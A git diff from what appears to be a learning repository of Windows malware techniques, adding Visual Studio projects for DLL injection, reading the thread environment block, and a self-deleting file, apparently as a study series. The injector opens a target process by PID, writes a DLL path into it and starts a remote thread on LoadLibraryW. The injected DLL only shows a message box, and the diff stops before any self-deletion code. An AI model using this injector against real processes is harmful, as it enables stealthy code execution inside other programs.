{BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Release|x64.ActiveCfg = Release|x64 + {BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Release|x64.Build.0 = Release|x64 + {BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Release|x86.ActiveCfg = Release|Win32 + {BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {3E0139CA-2DBD-4D12-9021-4726BA431966} + EndGlobalSection +EndGlobal diff --git a/4-dll-injection/injecting-dll/injecting-dll.vcxproj b/4-dll-injection/injecting-dll/injecting-dll.vcxproj new file mode 100644 index 0000000..9bbcfbf --- /dev/null +++ b/4-dll-injection/injecting-dll/injecting-dll.vcxproj @@ -0,0 +1,135 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 17.0 + Win32Proj + {bc4eec10-1490-4c6e-a053-ecfdde0b6970} + injectingdll + 10.0 + + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + + + + + + + + + + + + + + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/4-dll-injection/injecting-dll/injecting-dll.vcxproj.filters b/4-dll-injection/injecting-dll/injecting-dll.vcxproj.filters new file mode 100644 index 0000000..ce0c35c --- /dev/null +++ b/4-dll-injection/injecting-dll/injecting-dll.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/4-dll-injection/injecting-dll/main.cpp b/4-dll-injection/injecting-dll/main.cpp new file mode 100644 index 0000000..d8fd0a6 --- /dev/null +++ b/4-dll-injection/injecting-dll/main.cpp @@ -0,0 +1,64 @@ +#include +#include + +#define log_info(msg, ...) printf("[*] " msg "\n", ##__VA_ARGS__) +#define log_err(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__) +#define log_ok(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__) + +wchar_t dll_path[] = L"my-dll.dll"; + +int main(int argc, char **argv) { + if (argc < 2) { + log_err("Usage: %s ", argv[0]); + return -1; + } + + DWORD pid = atoi(argv[1]); + log_info("Using PID: %ld", pid); + + HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); + if (process == NULL) { + log_err("Failed to open process handle: %ld", GetLastError()); + return -1; + } + log_ok("Sucessfully opened process handle"); + + LPVOID buffer = VirtualAllocEx(process, NULL, sizeof(dll_path), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); + if (buffer == NULL) { + log_err("Failed to allocate buffer in process: %ld", GetLastError()); + CloseHandle(process); + return -1; + } + log_ok("Successfully allocated a %lld byte buffer", sizeof(dll_path)); + + WriteProcessMemory(process, buffer, dll_path, sizeof(dll_path), NULL); + log_info("Wrote DLL path to buffer"); + + HMODULE kernel32 = GetModuleHandleW(L"Kernel32"); + if (kernel32 == NULL) { + log_err("Failed to open 'Kernel32' module: %ld", GetLastError()); + CloseHandle(process); + return -1; + } + log_ok("Got ahdle to Kernel32.dll: 0x%p", kernel32); + + LPTHREAD_START_ROUTINE thread_callback = (LPTHREAD_START_ROUTINE)GetProcAddress(kernel32, "LoadLibraryW"); + log_info("Got address of LoadLibrary(): 0x%p", thread_callback); + + DWORD thread_id = 0; + HANDLE thread = CreateRemoteThreadEx(process, NULL, 0, thread_callback, buffer, 0, 0, &thread_id); + if (thread == NULL) { + log_err("Failed to create thread: %ld", GetLastError()); + CloseHandle(process); + return -1; + } + + log_info("Waiting for thread to finish..."); + WaitForSingleObject(thread, INFINITE); + log_info("Thread finished!"); + + log_info("Cleaning up handles"); + CloseHandle(process); + CloseHandle(thread); + return 0; +} \ No newline at end of file diff --git a/4-dll-injection/my-dll/main.cpp b/4-dll-injection/my-dll/main.cpp new file mode 100644 index 0000000..d842178 --- /dev/null +++ b/4-dll-injection/my-dll/main.cpp @@ -0,0 +1,11 @@ +#include + +BOOL WINAPI DllMain(HINSTANCE hModule, DWORD reason, LPVOID lpvReserved) { + switch (reason) { + case DLL_PROCESS_ATTACH: + MessageBoxW(NULL, L"WHO GOES THERE", L"KAW KAW KAW", MB_ICONEXCLAMATION); + break; + } + + return TRUE; +} \ No newline at end of file diff --git a/4-dll-injection/my-dll/my-dll.vcxproj b/4-dll-injection/my-dll/my-dll.vcxproj new file mode 100644 index 0000000..a0895d1 --- /dev/null +++ b/4-dll-injection/my-dll/my-dll.vcxproj @@ -0,0 +1,135 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 17.0 + Win32Proj + {b1344f8d-bcf5-489e-95e3-d15b7850250b} + mydll + 10.0 + + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + DynamicLibrary + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + + + + + + + + + + + + + + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/4-dll-injection/my-dll/my-dll.vcxproj.filters b/4-dll-injection/my-dll/my-dll.vcxproj.filters new file mode 100644 index 0000000..ce0c35c --- /dev/null +++ b/4-dll-injection/my-dll/my-dll.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/5-analyze-teb-struct/.gitignore b/5-analyze-teb-struct/.gitignore new file mode 100644 index 0000000..8dd4607 --- /dev/null +++ b/5-analyze-teb-struct/.gitignore @@ -0,0 +1,398 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. +## +## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Mono auto generated files +mono_crash.* + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +[Ww][Ii][Nn]32/ +[Aa][Rr][Mm]/ +[Aa][Rr][Mm]64/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ +[Ll]ogs/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUnit +*.VisualState.xml +TestResult.xml +nunit-*.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# ASP.NET Scaffolding +ScaffoldingReadMe.txt + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.tlog +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Coverlet is a free, cross platform Code Coverage Tool +coverage*.json +coverage*.xml +coverage*.info + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# NuGet Symbol Packages +*.snupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx +*.appxbundle +*.appxupload + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!?*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser +*- [Bb]ackup.rdl +*- [Bb]ackup ([0-9]).rdl +*- [Bb]ackup ([0-9][0-9]).rdl + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio 6 auto-generated project file (contains which files were open etc.) +*.vbp + +# Visual Studio 6 workspace and project file (working project files containing files to include in project) +*.dsw +*.dsp + +# Visual Studio 6 technical files +*.ncb +*.aps + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# Visual Studio History (VSHistory) files +.vshistory/ + +# BeatPulse healthcheck temp database +healthchecksdb + +# Backup folder for Package Reference Convert tool in Visual Studio 2017 +MigrationBackup/ + +# Ionide (cross platform F# VS Code tools) working folder +.ionide/ + +# Fody - auto-generated XML schema +FodyWeavers.xsd + +# VS Code files for those working on multiple tools +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +*.code-workspace + +# Local History for Visual Studio Code +.history/ + +# Windows Installer files from build outputs +*.cab +*.msi +*.msix +*.msm +*.msp + +# JetBrains Rider +*.sln.iml \ No newline at end of file diff --git a/5-analyze-teb-struct/5-analyze-teb-struct.sln b/5-analyze-teb-struct/5-analyze-teb-struct.sln new file mode 100644 index 0000000..7244c96 --- /dev/null +++ b/5-analyze-teb-struct/5-analyze-teb-struct.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.7.34221.43 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "5-analyze-teb-struct", "5-analyze-teb-struct.vcxproj", "{211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Debug|x64.ActiveCfg = Debug|x64 + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Debug|x64.Build.0 = Debug|x64 + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Debug|x86.ActiveCfg = Debug|Win32 + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Debug|x86.Build.0 = Debug|Win32 + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Release|x64.ActiveCfg = Release|x64 + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Release|x64.Build.0 = Release|x64 + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Release|x86.ActiveCfg = Release|Win32 + {211ECABF-B0AD-4CAE-A3A0-4B4E23A0E8E3}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {E2E11117-4EFF-4333-9A89-964BD205F31B} + EndGlobalSection +EndGlobal diff --git a/5-analyze-teb-struct/5-analyze-teb-struct.vcxproj b/5-analyze-teb-struct/5-analyze-teb-struct.vcxproj new file mode 100644 index 0000000..9c516dd --- /dev/null +++ b/5-analyze-teb-struct/5-analyze-teb-struct.vcxproj @@ -0,0 +1,140 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 17.0 + Win32Proj + {211ecabf-b0ad-4cae-a3a0-4b4e23a0e8e3} + My5analyzetebstruct + 10.0 + + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + + + + + + + + + + + + + + + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + + + + + \ No newline at end of file diff --git a/5-analyze-teb-struct/5-analyze-teb-struct.vcxproj.filters b/5-analyze-teb-struct/5-analyze-teb-struct.vcxproj.filters new file mode 100644 index 0000000..9d9f443 --- /dev/null +++ b/5-analyze-teb-struct/5-analyze-teb-struct.vcxproj.filters @@ -0,0 +1,27 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + + + Source Files + + + \ No newline at end of file diff --git a/5-analyze-teb-struct/lasterror.asm b/5-analyze-teb-struct/lasterror.asm new file mode 100644 index 0000000..3dfcd82 --- /dev/null +++ b/5-analyze-teb-struct/lasterror.asm @@ -0,0 +1,15 @@ +.code + +getTEB proc + mov rax, qword ptr gs:[30h] + ret +getTEB endp + +CustomError proc + xor eax, eax + call getTEB + mov eax, dword ptr [rax+68h] ; GetLastError() + ret +CustomError endp + +end \ No newline at end of file diff --git a/5-analyze-teb-struct/main.cpp b/5-analyze-teb-struct/main.cpp new file mode 100644 index 0000000..b1fe7aa --- /dev/null +++ b/5-analyze-teb-struct/main.cpp @@ -0,0 +1,24 @@ +#include +#include +#include +#include + +#define log(msg, ...) printf(msg "\n", ##__VA_ARGS__) + +extern "C" { + extern PTEB getTEB(void); + extern DWORD CustomError(void); +} + +int main() { + log("TEB: 0x%p", getTEB()); + + { + HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 1337); + assert(process == NULL); + log("Real GetLastError: %ld", GetLastError()); + log("Custom GetLastError: %ld", CustomError()); + } + + return 0; +} \ No newline at end of file diff --git a/6-self-deleting-file/.gitignore b/6-self-deleting-file/.gitignore new file mode 100644 index 0000000..8dd4607 --- /dev/null +++ b/6-self-deleting-file/.gitignore @@ -0,0 +1,398 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. +## +## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Mono auto generated files +mono_crash.* + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +[Ww][Ii][Nn]32/ +[Aa][Rr][Mm]/ +[Aa][Rr][Mm]64/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ +[Ll]ogs/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUnit +*.VisualState.xml +TestResult.xml +nunit-*.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# ASP.NET Scaffolding +ScaffoldingReadMe.txt + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.tlog +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Coverlet is a free, cross platform Code Coverage Tool +coverage*.json +coverage*.xml +coverage*.info + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# NuGet Symbol Packages +*.snupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx +*.appxbundle +*.appxupload + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!?*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser +*- [Bb]ackup.rdl +*- [Bb]ackup ([0-9]).rdl +*- [Bb]ackup ([0-9][0-9]).rdl + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio 6 auto-generated project file (contains which files were open etc.) +*.vbp + +# Visual Studio 6 workspace and project file (working project files containing files to include in project) +*.dsw +*.dsp + +# Visual Studio 6 technical files +*.ncb +*.aps + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# Visual Studio History (VSHistory) files +.vshistory/ + +# BeatPulse healthcheck temp database +healthchecksdb + +# Backup folder for Package Reference Convert tool in Visual Studio 2017 +MigrationBackup/ + +# Ionide (cross platform F# VS Code tools) working folder +.ionide/ + +# Fody - auto-generated XML schema +FodyWeavers.xsd + +# VS Code files for those working on multiple tools +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +*.code-workspace + +# Local History for Visual Studio Code +.history/ + +# Windows Installer files from build outputs +*.cab +*.msi +*.msix +*.msm +*.msp + +# JetBrains Rider +*.sln.iml \ No newline at end of file diff --git a/6-self-deleting-file/6-self-deleting-file.sln b/6-self-deleting-file/6-self-deleting-file.sln new file mode 100644 index 0000000..5e56aa3 --- /dev/null +++ b/6-self-deleting-file/6-self-deleting-file.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.7.34221.43 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "6-self-deleting-file", "6-self-deleting-file.vcxproj", "{EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Debug|x64.ActiveCfg = Debug|x64 + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Debug|x64.Build.0 = Debug|x64 + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Debug|x86.ActiveCfg = Debug|Win32 + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Debug|x86.Build.0 = Debug|Win32 + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Release|x64.ActiveCfg = Release|x64 + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Release|x64.Build.0 = Release|x64 + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Release|x86.ActiveCfg = Release|Win32 + {EE4BA920-649E-4427-81D2-BC0EF9FA6DEC}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {D9AB18D6-CC27-4D07-B761-691173B1DA1B} + EndGlobalSection +EndGlobal diff --git a/6-self-deleting-file/6-self-deleting-file.vcxproj b/6-self-deleting-file/6-self-deleting-file.vcxproj new file mode 100644 index 0000000..35f22a8 --- /dev/null +++ b/6-self-deleting-file/6-self-deleting-file.vcxproj @@ -0,0 +1,141 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 17.0 + Win32Proj + {ee4ba920-649e-4427-81d2-bc0ef9fa6dec} + My6selfdeletingfile + 10.0 + + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + + + + + + + + + + + + + + + + + + + + + Level3 + true + 